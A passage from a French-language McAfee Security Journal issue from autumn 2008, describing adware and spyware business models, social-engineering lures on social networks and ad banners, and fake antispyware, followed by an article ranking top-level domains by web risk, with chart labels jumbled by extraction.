le nombre de téléchargements sur son site, Paul essaie alors Logiciels de surveillance
d'attirer de nouveaux visiteurs à l'aide de contenus attrayants, Figure 2 : Les logiciels espions et les logiciels de surveillance ont vu leur nombre
comme des titres accrocheurs, des images et vidéos pour adultes, diminuer globalement depuis 2005, mais nous devons nous attendre à une
ou encore des jeux et sonneries téléphoniques gratuits. recrudescence fin 2008. (Source : McAfee Avert Labs)

AUTOMNE 2008 39
t Exploits L'installation de logiciels publicitaires par le biais
d'exploits peut être effectuée sans intervention de l'utilisateur,
bien que celui-ci soit dans la plupart des cas appâté par des
techniques d'ingénierie sociale vers des sites web malveillants
hébergeant ces mêmes exploits.
Paiement au clic : le modèle côté serveur6
Le modèle avec paiement au clic existe sous deux formes : les
publicités sponsorisées et les publicités basées sur le contenu.
Ce modèle ne requiert aucune installation de logiciel espion ou
de logiciel publicitaire sur l'ordinateur de l'utilisateur, mais peut
exploiter le contenu saisi ou demandé (à partir des résultats
proposés par un moteur de recherche, p. ex.) pour diffuser
des publicités ciblées. Les publicités contextuelles de Google,
notamment, fonctionnent sur le modèle du paiement au clic.
Les mécanismes de diffusion les plus répandus de publicité par
paiement au clic sont les suivants :
t Bannières publicitaires Les publicités sont affichées sous
forme de bannières ou de zones délimitées. Leur contenu peut
être modifié régulièrement.
t Fenêtres pop-up en avant ou en arrière plan Les publicités
sont affichées sous forme de fenêtres séparées, représentant
une gêne pour l'utilisateur.
t Publicités au format Flash Ces publicités sont semblables
aux bannières publicitaires, à la différence que les publicités
sont animées et que leur contenu évolue.
Le modèle avec paiement au clic peut fonctionner de manière
bien plus contrôlée, dans la mesure où le responsable du site
web hébergeant ces publicités peut en choisir le mécanisme de
diffusion. Bien que ce modèle soit basé sur le serveur et semble
plus sûr pour l'utilisateur, il n'est pas dénué de risques. Certains
arnaqueurs peuvent toujours utiliser des pratiques trompeuses
pour piéger les utilisateurs7.
La plupart des contenus publicitaires étant stockés sur des
serveurs et faisant appel à des technologies de type JavaScript
et Flash notamment, l'insertion de publicités malveillantes à la
source ne pose aucune difficulté8, 9. A titre d'exemple, un réseau
publicitaire détenu par Yahoo a pendant un certain temps
diffusé sans le savoir des bannières publicitaires malveillantes
ayant pour effet le téléchargement de chevaux de Troie sur les
ordinateurs des utilisateurs. Dans ce cas particulier, les bannières
étaient affichées sur des sites aussi populaires que MySpace et
PhotoBucket. Ces publicités malveillantes avaient été intégrées au
réseau publicitaire de Yahoo sans être détectées. Il est également
arrivé que le système de clic soit corrompu par des techniques
d'empoisonnement du cache DNS10. Les utilisateurs ne sont
toutefois pas affectés directement dans ce cas ; les fournisseurs
d'accès et les serveurs publicitaires sont en effet plus vulnérables
à ce type de menace.
Pour réduire plus efficacement les vecteurs d'attaque exploitant
ces modèles de compensation, il est important d'examiner
rapidement le rôle que jouent les techniques d'ingénierie sociale
sur un marché où le nombre d'opportunités de génération de
revenus est quasiment illimité.
40 McAFEE SECURITY JOURNAL
Les différents aspects de l'ingénierie sociale
Les pirates informatiques s'attaqueront toujours au maillon le
plus faible du système de sécurité, c'est-à-dire l'utilisateur lui-
même. — Kevin Mitnick (2007)11
Quel que soit le modèle utilisé par les développeurs de logiciels
publicitaires, le facteur de réussite principal reste l'utilisateur.
Dans l'exemple de Paul Dupont, les utilisateurs étaient infectés
après avoir visité le site web malveillant, attirés par les stratégies
d'ingénierie sociale de Paul. L'une des raisons pour lesquelles ces
stratégies fonctionnent si bien est que la plupart des utilisateurs
font par nature confiance à ce qu'on leur présente et ne se méfient
pas de certaines activités en ligne. Les concepteurs de techniques
d'ingénierie sociale aux intentions malveillants savent quant à eux
très bien exploiter les faiblesses de la nature humaine. Une étude
de cas réalisée par le ministère de l'Intérieur américain révèle que
84 % des administrations américaines attribuent un certain nombre
de failles de sécurité à des erreurs humaines et 80 % les expliquent
par un manque de formation et de connaissances en matière de
sécurité ou à un non-respect des procédures mises en place12.
Des centaines de milliers de logiciels malveillants font appel à des
techniques d'ingénierie sociale pour pouvoir être installés sur les
ordinateurs des utilisateurs : il s'agit de l'un des vecteurs les plus
courants dans la diffusion des logiciels malveillants. Matthew
Braveman classe les différents vecteurs d'installation en quatre
catégories principales13. Selon ses travaux, près d'un tiers des
logiciels malveillants a été installé à la suite de l'utilisation de
techniques d'ingénierie sociale.
Les créateurs de logiciels espions et de logiciels publicitaires ont
adopté de nombreuses techniques déjà populaires et ont développé
leurs propres techniques afin de diffuser leurs logiciels. L'ingénierie
sociale est le vecteur d'installation le plus répandu du modèle avec
paiement à l'installation, qui offre un nombre plus important de
possibilités de diffusion de logiciels espions et de logiciels publicitaires.
Ces applications peuvent être distribuées à l'aide de mécanismes
d'apparence inoffensifs, comme une offre groupée de logiciels
gratuits ou à l'aide de mécanismes plus douteux, comme le spam ou
les pièces jointes à des messages électroniques au contenu trompeur.
Un utilisateur souhaitant installer un logiciel gratuit peut par exemple
installer un logiciel publicitaire en toute connaissance de cause
afin de profiter gratuitement de services supplémentaires. Même si
l'installation d'un logiciel est effectuée par le biais d'un exploit ou de
spam, les sociétés de sécurité peuvent ne pas le considérer comme
malveillant si leur fournisseur affirme qu'il n'a joué aucun rôle dans la
diffusion de son logiciel et que celui-ci est exploité par des tiers.
La plupart des contenus publicitaires étant stockés sur
des serveurs et faisant appel à des technologies de type
JavaScript et Flash notamment, l'insertion de publicités
malveillantes à la source ne pose aucune difficulté.
La confiance au centre du problème
La figure 3 présente quatre scénarios d'exposition des utilisateurs à
un site pratiquant l'ingénierie sociale. Ce schéma très simple peut
nous permettre de comprendre les cas réels décrits ci-après. L'élément
essentiel à retenir est que plus le niveau de confiance est élevé,
plus les techniques d'ingénierie sociale se révèleront efficaces. Les
exemples nous permettront de mieux comprendre ces mécanismes.
 Site de réseau social
niveau de confiance élevé
Moteur de recherche
niveau de confiance bas
Utilisateur
Lien reçu par messagerie instantanée,
par e-mail ou par spam
niveau de confiance le plus faible
Lien reçu via le profil d'un ami sur un
site de réseau social, Google Bloc-notes
ou autre domaine de confiance
niveau de confiance élevé
Figure 3 : De nombreux vecteurs exposent les utilisateurs aux programmes indésirables et malveillants.
Cas nº 1 : Sites web de réseau social
Les sites web de réseau social représentent une véritable aubaine
en termes d'ingénierie sociale, dans la mesure où les personnes
qui s'y rendent cherchent soit à rester en contact avec des amis,
soit à s'en faire de nouveaux. Les concepteurs de technique
d'ingénierie sociale peuvent en profiter pour créer des liens et
développer le facteur confiance, comme illustré dans le 1er cadre
de la figure 3, puisque cette catégorie de sites web bénéficie
d'un niveau de confiance très élevé.
Un certain nombre d'attaques ont fait parler d'elles en exploitant
cette confiance pour installer des logiciels publicitaires sur les
ordinateurs des utilisateurs :
t MySpace Adult Content Viewer (Visualiseur de contenu
pour adultes MySpace) (niveau de confiance : moyen). La
technique utilisée dans ce cas consistait à inciter les utilisateurs
à cliquer sur une fenêtre pop-up présentant des jeunes gens
et portant un titre du type « I want to be loved » (Je veux
qu'on m'aime)14. En cliquant sur ces publicités, les utilisateurs
pouvaient télécharger le logiciel MySpace Adult Content, qui
apparemment téléchargeait lui-même un logiciel publicitaire.
t Vidéo YouTube frauduleuse sur MySpace (niveau de confiance :
élevé). WebSense a indiqué en 2006 qu'une vidéo YouTube
frauduleuse apparaissait sur plusieurs faux profils MySpace15.
Tout utilisateur essayant de regarder cette vidéo se voyait
proposer de procéder à l'installation de ZangoCash.
t Application Facebook Secret Crush (niveau de confiance : très
élevé). En janvier 2008, Fortinet a publié un avertissement relatif
à un widget malveillant appelé « Secret Crush » qui tentait
d'installer des logiciels publicitaires16. Cette technique d'ingénierie
sociale se basait sur l'envoi d'une invitation Facebook portant
le titre « 1 secret crush invitation » (Vous avez un admirateur
secret). Après avoir accepté cette invitation, l'utilisateur devait
installer un widget afin de connaître l'identité de cet admirateur.
Il était ensuite invité à l'envoyer à cinq amis avant de découvrir
enfin le nom de cette personne. Les internautes les plus crédules
transféraient alors ce message à cinq autres personnes, participant
du même coup à la propagation d'un véritable ver social. Une fois
la procédure terminée, tout ce à quoi les utilisateurs avaient droit
était un message les invitant à télécharger le logiciel publicitaire
Zango. Cette technique a connu un grand succès dans la mesure
où le niveau de confiance du site Facebook est très élevé.
Cas nº 2 : Bannières publicitaires
Les bannières publicitaires fonctionnent sur le modèle avec
paiement au clic. Les bannières bénéficiaient d'un niveau de
Site web utilisant des techniques
d'ingénierie sociale (liens vers des
fichiers MP3 gratuits, des vidéos
pour adultes, etc.)
confiance très élevé puisque les utilisateurs visitaient des sites de
confiance qu'ils consultaient régulièrement.
t En 2006, The Washington Post a dévoilé la présence d'une
bannière malveillante sur MySpace utilisée pour la diffusion
d'un logiciel publicitaire et de chevaux de Troie auprès de
millions d'utilisateurs, par l'exploitation d'une défaillance au
niveau de Microsoft Windows Metafile ; cela ne nécessitait
aucune intervention des utilisateurs17.
t Nous assistons en 2008 à une augmentation du nombre
de bannières publicitaires malveillantes. Le dernier incident
significatif, au moment où nous écrivons ces lignes, concernait
une publicité Flash sur le site usatoday.com18. Par une simple
visite sur la page d'accueil, les utilisateurs étaient assaillis par
divers logiciels malveillants et fausses alertes (technique populaire
d'ingénierie sociale) les invitant à télécharger un faux outil
de protection antispyware appelé Malware Alert. (Ce type de
programme malveillant peut aussi bien contenir des programmes
potentiellement indésirables que des chevaux de Troie.)
Cas nº 3 : Autres tactiques douteuses
t Usurpation d'adresses e-mail (niveau de confiance : faible).
Cette tactique a par exemple été utilisée dans le cadre de
l'envoi d'e-mails à partir de fausses adresses eBay incluant un
lien vers un logiciel publicitaire19. Ces messages invoquaient
un problème au niveau des informations de facturation et
demandaient aux utilisateurs de mettre à jour celles-ci en
téléchargeant un logiciel.
t Fausses pages d'erreur (niveau de confiance : moyen). Certains
sites web affichaient de fausses pages d'erreur de type « Page
non trouvée » et proposaient à l'utilisateur de résoudre ce
problème en téléchargeant un contrôle ActiveX qui avait pour
rôle d'installer WinFixer20.
t Spam lié à Google Bloc-notes (niveau de confiance : élevé).
Certains arnaqueurs ont récemment eut recours à une nouvelle
technique d'ingénierie sociale consistant à envoyer par e-mail
des liens vers des pages Google Bloc-notes21. Ces liens suivaient
le format suivant : www.google.com/notebook/public/[ID-
utilisateur]/[bloqué]. Le nom de domaine « google.com » met
les utilisateurs en confiance et les incite à cliquer sur des liens les
amenant sur des pages web malveillantes, hébergeant elles-
mêmes de nombreux liens vers des sites pour adultes ou de
fausses vidéos. Leur réel objectif est en fait d'amener l'utilisateur
à procéder au téléchargement de faux programmes antispyware.
AUTOMNE 2008 41
Une retraite silencieuse
L'absence de législation régulant l'utilisation de logiciels espions
et logiciels publicitaires a permis aux développeurs de bénéficier
d'une liberté totale, que leurs intentions soient purement vénales
ou réellement malveillantes. A première vue, il semblait que les
utilisateurs étaient protégés par la présence d'un contrat de licence
les avertissant de possibles effets indésirables de ces applications.
Ces contrats étaient toutefois incomplets et obscurs, ou n'étaient
tout simplement pas affichés. Lorsqu'un utilisateur parvenait à les
consulter, ces contrats étaient généralement illisibles, présentés
dans des fenêtres trop petites n'affichant que quelques mots à
la fois. Alors qu'ils semblaient favorisés par de tels stratagèmes,
pourquoi les logiciels espions et logiciels publicitaires sont-il en
perte de puissance ? Plusieurs facteurs ont contribué à ce déclin.
t Poursuites judiciaires Suite à une augmentation des incidents
imputés à des logiciels espions et logiciels publicitaires, de
nombreux clients et autres parties ont porté plainte contre
certains grands distributeurs de logiciels malveillants22, 23, 24, 25, 26, 27.
Plusieurs décisions de justice ont permis de limiter leur
prolifération. Lors du procès contre Zango12 par exemple, la
cour a exigé que cette société surveille ses distributeurs tiers afin
de s'assurer que l'ensemble de ses partenaires se conforment
aux exigences de la Federal Trade Commission (FTC) — agence
fédérale américaine chargée de la protection des consommateurs
et de la concurrence. Le tribunal a également interdit à Zango
d'exploiter, directement ou par l'intermédiaire de tiers, des
vulnérabilités de sécurité dans le but de télécharger des logiciels.
De plus, il a exigé que la société indique de manière claire et
précise ses conditions de divulgation et obtienne le consentement
exprès de l'utilisateur avant tout téléchargement de logiciel
sur son ordinateur. Ce type de décision a permis de minimiser
l'impact du modèle avec paiement à l'installation et a forcé les
distributeurs publicitaires à mettre de l'ordre dans leurs pratiques.
t Prise de conscience du grand public et groupes sectoriels
La FTC met à la disposition des utilisateurs un site web
d'informations28 offrant un certain nombre de conseils sur
la protection contre les logiciels espions et sur la meilleure
manière de signaler des abus. L'Anti-Spyware Coalition
propose également une mine d'informations sur ce type de
menace29. Grâce aux efforts déployés par ces organisations,
consommateurs et législateurs bénéficient désormais d'une
meilleure compréhension des problèmes et des règles inhérents
à la publicité en ligne. Cette prise de conscience a également
permis de limiter l'apparition de ces applications indésirables.
t Mauvaise publicité et procès éventuels contre des
annonceurs ayant un lien avec des fournisseurs de
logiciels publicitaires Les fonds ayant permis de financer le
marché des logiciels espions et logiciels publicitaires proviennent
à l'origine des annonceurs recourant à des fournisseurs de
logiciels publicitaires pour diffuser leurs publicités. Ces sociétés
marchandes et de services n'avaient pas cherché à savoir dans le
détail de quelle manière les fournisseurs de logiciels publicitaires
diffuseraient leurs annonces. Selon un jugement du
29 janvier 200730 qui a depuis fait jurisprudence, l'accord
indiquait qu'avant de faire appel à une société assurant la
diffusion de leurs publicités, puis de manière trimestrielle, toute
société se doit de s'enquérir des méthodes de diffusion utilisées.
42 McAFEE SECURITY JOURNAL
Les entreprises doivent immédiatement cesser l'utilisation de
programmes publicitaires ne respectant pas les conditions de
l'accord établi ou leurs propres politiques d'utilisation des
logiciels publicitaires. Dans la mesure où les annonceurs ont
maintenant conscience des risques associés au modèle avec
paiement à l'installation (violation de la vie privée, vices du
consentement, etc.), ils tendent à opter pour le modèle avec
paiement au clic qui lui ne requiert l'installation d'aucun logiciel
sur l'ordinateur de l'utilisateur.
Applications malveillantes
Parce que les auteurs de logiciels malveillants s'enrichissent
facilement en jouant sur les peurs des utilisateurs, on assiste à
l'apparition d'une nouvelle tendance consistant à diffuser des
applications malveillantes et de fausses alertes relatives à des chevaux
de Troie, affichant des messages d'erreur et d'infections visant à
tromper l'utilisateur. Dans la plupart des cas, ces fausses alertes
d'infection par chevaux de Troie permettent en fait le téléchargement
d'applications malveillantes détectant de faux fichiers et clés de
Registre et les présentant comme des logiciels malveillants. Ces
applications copient parfois certains fichiers sur le système de
l'utilisateur uniquement pour pouvoir les détecter par la suite ; elles
entrent dans la catégorie des chevaux de Troie (voir figure 4).
Nous avons également constaté que les chevaux de Troie
servaient souvent à installer des logiciels publicitaires.
Downloader-UA fait partie de la catégorie des chevaux de
Troie qui font appel à des techniques d'ingénierie sociale
pour télécharger de faux programmes. Découverte en 2004,
cette catégorie de chevaux de Troie exploite des vulnérabilités
de Microsoft Windows Media Player dans l'utilisation de la
technologie DRM (Digital Rights Management) et incite les
utilisateurs à télécharger des fichiers spécialement développés
à des fins malveillantes31,32. En 2008, un tel cheval de Troie a
été utilisé pour amener les utilisateurs à télécharger un faux
logiciel de lecture de fichiers MP3 intégrant une sélection de
chansons. Une fois installé, ce logiciel procédait lui-même au
téléchargement nombreux logiciels publicitaires33.
Par comparaison avec les années précédentes, la croissance
du nombre d'applications malveillantes (programmes
potentiellement indésirables et chevaux de Troie) s'est accentuée
de manière exponentielle en 2008 (voir figure 4).
Applications malveillantes
1 000
500
0
2005 2006 2007 2008
(estimation)
Programmes potentiellement indésirables
Chevaux de Troie
Figure 4 : Contrairement aux logiciels espions et logiciels publicitaires, le nombre
d'applications malveillantes (programmes potentiellement indésirables et chevaux de
Troie) a augmenté de manière significative en 2008. (Source : McAfee Avert Labs)

Figure 5 : De nombreux noms de domaine sont associés à une même adresse IP
distribuant des applications malveillantes traduites.
Pour mesurer la fréquence des faux logiciels antispyware distribués
par le biais de chevaux de Troie, nous avons analysé un ensemble
d'adresses IP utilisées pour leur téléchargement. Une requête
exécutée via hosts-files.net a permis de découvrir qu'une même
adresse IP était associée à 158 domaines différents34 (voir figure 5).
Chacun des domaines répertoriés à la figure 5 propose soit un
faux programme antispyware, soit une application malveillante
de « nettoyage » du système. Ces pages existent même en
plusieurs langues. Après une analyse de 620 pages, nous
avons identifié 24 langues différentes à la fois pour les pages
web et les applications proposées, ce qui montre bien que
ces menaces ont depuis longtemps dépassé les frontières des
pays de langue anglaise. Il s'est avéré qu'une même adresse
IP était souvent associée à plusieurs domaines, allant parfois
jusqu'à 200 domaines différents. Une recherche à partir du
terme « FSA », utilisé par le site hosts-files.net pour décrire les
domaines hébergeant des applications malveillantes, a renvoyé
près de 3 600 résultats différents35.
NOTES
1 http://www.antispywarecoalition.org/documents/2007glossary.htm
2 OptOut, Gibson Research Corp — http://www.grc.com/optout.htm
3 http://en.wikipedia.org/wiki/Compensation_methods
4 Source : Site web Zango — http://www.cdt.org/headlines/headlines.php?iid=51
5 http://www.benedelman.org/news/062907-1.html
6 http://en.wikipedia.org/wiki/Compensation_methods#Pay-per-click_.28PPC.29
7 http://www.benedelman.org/ppc-scams/
8 http://msmvps.com/blogs/spywaresucks/archive/2007/08/22/1128996.aspx
9 http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/
10 http://www.secureworks.com/research/threats/ppc-hijack/
11 http://www.csc.com/cscworld/012007/dep/fh001.shtml
12 http://www.usgs.gov/conferences/presentations/5SocialEngineeringInternal
ExternalThreat%20Dudeck.ppt
13 http://download.microsoft.com/download/c/e/c/cecd00b7-fe5e-4328-8400-
2550c479f95d/Social_Engineering_Modeling.pdf
14 http://mashable.com/2006/10/11/myspace-adult-content-viewer-more-adware/
15 http://securitylabs.websense.com/content/Alerts/1300.aspx
16 http://www.fortiguardcenter.com/advisory/FGA-2007-16.html
17 http://blog.washingtonpost.com/securityfix/2006/07/
myspace_ad_served_adware_to_mo.html
Conclusion
Une simple analyse statistique permet de se rendre compte
que la croissance du nombre de logiciels espions et de logiciels
publicitaires tend à s'essouffler. Les étonnantes techniques
d'ingénierie sociale utilisées pour diffuser ces programmes
potentiellement indésirables sont toutefois bien ancrées,
distribuant toujours des applications malveillantes et des
chevaux de Troie. Avec l'essor du modèle avec paiement au clic,
nul ne peut douter que de nouvelles techniques d'ingénierie
sociale verront bientôt le jour, incitant les utilisateurs à cliquer
sur des publicités et générant toujours plus de profits pour les
annonceurs. On peut également compter sur une augmentation
de la diffusion de logiciels publicitaires et de chevaux de Troie sur
les sites de réseau social. Bien que le nombre total de logiciels
espions et logiciels publicitaires ait baissé, aucune panacée
ne semble pouvoir enrayer à court terme la prolifération des
programmes indésirables. Dans la mesure où les fournisseurs de
logiciels publicitaires paient pour chaque installation effectuée,
l'éthique voudrait qu'ils s'efforcent de garder une trace de
chaque installation et empêchent toute diffusion illégitime de
leurs logiciels. Mais peut-on réellement espérer qu'ils le fassent ?
Dans un monde où les menaces évoluent constamment et où les
chevaux de Troie lucratifs sont en plein essor, nous devons rester
vigilants et former les travailleurs et particuliers afin qu'ils prennent
conscience des dangers de ces techniques d'ingénierie sociale.
Aditya Kapoor est expert en recherche auprès
de McAfee Avert Labs. Il a découvert l'ingénierie
inverse il y a six ans à l'université de Lafayette en
Louisiane, en rédigeant son mémoire de maîtrise
sur un algorithme de désassemblage visant au
démasquage de code. Chez McAfee, Kapoor
a développé ses compétences en analyse de
rootkits, en comparaison de code et en analyse
comportementale. Ses passions incluent les
voyages, ainsi que la découverte de cultures et
d'architectures de pays étrangers.
18 http://securitylabs.websense.com/content/Alerts/3061.aspx
19 http://securitylabs.websense.com/content/Alerts/738.aspx
20 http://www.avertlabs.com/research/blog/index.php/2006/12/04/
404-not-just-file-not-found/
21 http://www.cantoni.org/2008/06/04/google-notebook-spam
22 http://www.benedelman.org/spyware/nyag-dr/
23 http://www.oag.state.ny.us/media_center/2005/apr/apr28a_05.html
24 http://www.internetlibrary.com/cases/lib_case358.cfm
25 http://blogs.zdnet.com/Spyware/?p=655
26 http://www.ftc.gov/opa/2006/11/zango.shtm
27 http://www.ftc.gov/bcp/edu/microsites/spyware/law_enfor.htm
28 http://onguardonline.gov/spyware.html
29 http://www.antispywarecoalition.org/
30 http://www.oag.state.ny.us/media_center/2007/jan/jan29b_07.html
31 http://www.pcworld.com/article/119016/risk_your_pcs_health_for_a_song.html
32 http://vil.nai.com/vil/content/v_130856.htm
33 http://www.avertlabs.com/research/blog/index.php/2008/05/06/
fake-mp3s-running-rampant/
34 http://hosts-file.net/?s=67.55.81.200&sDM=1#matches
35 http://hosts-file.net/?s=Browse&f=FSA
AUTOMNE 2008 43
Quel niveau de
risque pour les
domaines de
premier niveau ?
David Marcus
Les données McAfee SiteAdvisor permettent d'étudier l'évolution
des risques dans le monde.
Dans son excellent article « Cartographie mise à jour du Web
malveillant », publié dans le bulletin d'informations Perspectives
McAfee sur la sécurité1 de juin 2008, notre collègue Shane Keats
a analysé en profondeur la répartition des sites web malveillants
sur Internet à partir de données recueillies grâce au logiciel
McAfee® SiteAdvisor®. De nos jours, les internautes souhaitent
pouvoir surfer et effectuer leurs recherches dans un environnement
entièrement sécurisé. Mais si l'on compare Internet à une immense
ville numérique, comment savoir quels sont les quartiers qu'il
est plus prudent d'éviter ? Quels domaines présentent le plus de
risques ? Quel domaine de premier niveau a fait le plus de progrès
en matière de sécurité ? Lequel est le plus à la traîne ? Certains
termes de recherche sont-ils plus risqués que d'autres ?
Les internautes se posent de plus en plus ce genre de questions.
L'objectif de McAfee Security Journal est de vous apporter les
réponses à ces questions à l'aide d'analyses et de données concrètes,
de sorte que vous puissiez prendre les meilleures décisions possible.
Dans la présente édition, nous avons compilé des informations
récentes sur les menaces liées aux domaines de premier niveau, qu'il
s'agisse de domaines génériques (.com, .info ou .biz notamment)
ou nationaux (dont .cn, .ru ou .br). Nous avons évalué les niveaux
de risques actuels que présentent ces domaines sur le continent
américain, en Europe et en Asie, mais aussi analysé leur évolution
depuis l'année passée. Nous avons classé chaque domaine de
premier niveau selon son profil de risque global, puis effectué une
analyse complémentaire en matière de pratiques de messagerie
électronique, de sécurité des téléchargements et de la prévalence
des exploits web. Nous avons ensuite dégagé les vingt domaines de
premier niveau qui se distinguaient pour chaque type de risque.
Les résultats se révèlent saisissants. Les données recueillies
montrent clairement que les risques ne sont pas répartis
uniformément sur Internet. Les domaines génériques et nationaux
présentent en effet des types et des degrés très variés de risques et
de dangers. Certains pays font preuve d'excellentes pratiques en
matière de courrier électronique, par exemple, mais d'habitudes
déplorables lorsqu'il est question des téléchargements. D'autres
sont quant à eux de vrais nids à exploits et codes malicieux. Nous
44 McAFEE SECURITY JOURNAL
espérons que ces résultats vous permettront de naviguer plus
sereinement. Pensez simplement à regarder où vous mettez les
pieds avant de vous promener sur Internet.
Analyse des graphiques Dans le diagramme intitulé « Domaines
de premier niveau d'Europe, du Moyen-Orient et d'Afrique classés
par profil de risque global », on peut voir que les domaines
roumains en .ro (barre à l'extrême gauche) représentent presque
7 %. Selon le logiciel SiteAdvisor, cela signifie que McAfee a
constaté que près de 7 % des sites appartenant à ce domaine de
premier niveau ont présenté une ou plusieurs menaces, comme
des exploits de navigateur, des logiciels publicitaires, des logiciels
espions, des chevaux de Troie ou des virus, du spam, des affiliations
à d'autres sites dangereux, des fenêtres pop-up agressives, ou ont
fait l'objet de commentaires de part de la communauté SiteAdvisor.
Plus cette valeur est élevée, plus le risque s'avère important pour les
utilisateurs. Pour mettre ces valeurs en perspective, nous proposons
sur le même graphique une courbe indiquant leur évolution par
rapport à l'année passée. Cette courbe montre qu'en Roumanie le
risque a augmenté d'environ 1 %, alors qu'il a par exemple baissé
de près de 3 % en Slovaquie. Les valeurs positives témoignent
d'une augmentation des risques par rapport à l'année précédente
et les valeurs négatives indiquent une diminution des risques.
David Marcus est responsable de la recherche en
sécurité et de la communication chez McAfee Avert
Labs. Il contribue à faire connaître la recherche
de pointe que mène Avert Labs auprès des clients
McAfee et de la communauté des experts en
sécurité. Marcus est actuellement responsable
des relations publiques et des médias, consultant
technologique, rédacteur en chef du blog McAfee
Avert Labs Security Blog, mais aussi co-présentateur
d'AudioParasitics, le podcast officiel de McAfee
Avert Labs. Outres ces nombreuses responsabilités,
il gère également l'ensemble des publications
d'Avert Labs, dont ce McAfee Security Journal
NOTES
1 http://www.mcafee.com/us/security_insights/archived/june_2008/si_jun1_08.html
Domaines de premier niveau d'Europe, du Moyen-Orient et d'Afrique classés par profil de risque global
8% Evolution du risque
entre 2007 et 2008
6%
(par point)
4% Risque global
2% en 2008

0%
-2 %
-4 %
Roumanie .ro
Russie .ru
Ukraine .ua
Union européenne .eu
Iran .ir
Espagne .es
Bulgarie .bg
Italie .it
France .fr
Lettonie .lv
Pologne .pl
Hongrie .hu
République tchèque .cz
Suisse .ch
Belgique .be
Turquie .tr
Slovaquie .sk
Israël .il
Allemagne .de
Lituanie .lt
Estonie .ee
Autriche .at
Portugal .pt
Pays-Bas .nl
Croatie .hr
Afrique du Sud .za
Royaume-Uni .uk
Yougoslavie .yu
Grèce .gr
Suède .se
Irlande .ie
Danemark .dk
Islande .is
Slovénie .si
Norvège .no
Finlande .fi
Domaines de premier niveau d'Asie classés par profil de risque global
20 % Evolution du risque
entre 2007 et 2008
18 %
(par point)
16 %
Risque global en 2008
14 %
12 %
10 %
8%
6%
4%
2%
0%
-2 %
-4 %
-6 %
-8 %
-10 %
Hong-Kong .hk

République populaire de Chine .cn

Philippines .ph

Iles Cocos (Keeling) .cc

Îles Samoa .ws

Inde .in

Corée du Sud .kr

Tuvalu .tv

Tonga .to

Viêt Nam .vn

Ile Christmas .cx

Taïwan (République de Chine) .tw

Tokélaou .tk

Nioué .nu

Thaïlande .th

Vanuatu .vu

Indonésie .id

Malaisie .my

Nouvelle-Zélande .nz

Singapour .sg

Australie .au

Japon .jp

Domaines de premier niveau du continent américain Critères de risque utilisés pour l'évaluation
classés par profil de risque global des domaines de premier niveau
2,5 % Evolution du risque Exploits de navigateurs
entre 2007 et 2008
2%
(par point)
1,5 %
Risque global en 2008
1% Logiciels publicitaires, Volume important
chevaux de Troie, d'e-mails commerciaux
0,5 % logiciels espions, virus

0%
-0,5 %
-1 % Affiliation avec Fenêtres pop-up
d'autres sites agressives
-1,5 % dangereux
Etats-Unis .us

Argentine .ar

Brésil .br

Mexique .mx

Chili .cl

Canada .ca

Venezuela .ve

Colombie .co

Commentaires et avis publiés

par la communauté SiteAdvisor

AUTOMNE 2008 45
 -5 %
0%
5%
10 %
15 %
20 %
25 %

46
-0,4 %
-0,2 %
0%
0,2 %
0,4 %
0,6 %
0,8 %
1%
1,2 %
-20 %
-10 %
0%
10 %
20 %
30 %
40 %
50 %
60 %
70 %
Roumanie .ro Informations .info Informations .info

Informations .info République populaire de Chine .cn Roumanie .ro

Nioué .nu Hong-Kong .hk Iles Samoa .ws

République populaire de Chine .cn Réseau .net Entreprises .biz

Russie .ru Russie .ru République populaire de Chine .cn

McAFEE SECURITY JOURNAL

Entreprises .biz Corée du Sud .kr Italie .it

Individus .name Entreprises .biz Individus .name

Iles Cocos (Keeling) .cc Taïwan (République de Chine) .tw Bulgarie .bg

Croatie .hr Commercial .com Belgique .be

Tonga .to Iles Samoa .ws Iles Cocos (Keeling) .cc

Ukraine .ua Yougoslavie .yu Tonga .to

Viêt Nam .vn Ukraine .ua Tuvalu .tv

Inde .in Thaïlande .th Réseau .net

Classement des domaines de premier niveau par pratiques en matière d'e-mail

Réseau .net Iles Cocos (Keeling) .cc Commercial .com

Portugal .pt Slovaquie .sk Etats-Unis .us

Iles Samoa .ws Croatie .hr Tokélaou .tk

Pologne .pl Union européenne .eu Ile Christmas .cx

Classement des 20 domaines de premier niveau présentant le plus grand nombre d'exploits
Etats-Unis .us Bulgarie .bg Lettonie .lv

Commercial .com Inde .in Israël .il

Classement des 20 domaines de premier niveau présentant le plus grand risque en termes de téléchargements

Hong-Kong .hk Lettonie .lv Viêt Nam .vn

en 2008

en 2008
en 2008
(par point)

(par point)
(par point)
Risque global

Risque global
Risque global
entre 2007 et 2008
Evolution du risque

entre 2007 et 2008

Evolution du risque
entre 2007 et 2008
Evolution du risque
AUTOMNE 2008 47
McAfee, Inc.
Tour Franklin
La Défense 8
92042 Paris La Défense Cedex
France
+33.1.47.62.56.00 (standard)
www.mcafee.com/fr

McAfee et/ou les autres marques citées dans ce document

sont des marques commerciales ou des marques commerciales
déposées de McAfee, Inc. et/ou de ses sociétés affiliées aux Etats-
Unis et/ou dans d'autres pays. La couleur rouge McAfee utilisée
pour identifier des fonctionnalités liées à la sécurité est propre
aux produits de la marque McAfee. Toutes les autres marques
commerciales déposées ou non déposées citées dans ce document
sont la propriété exclusive de leurs détenteurs respectifs.
© 2008 McAfee, Inc. Tous droits réservés.
48 McAFEE SECURITY JOURNAL
5001_sec-jrnl_fall08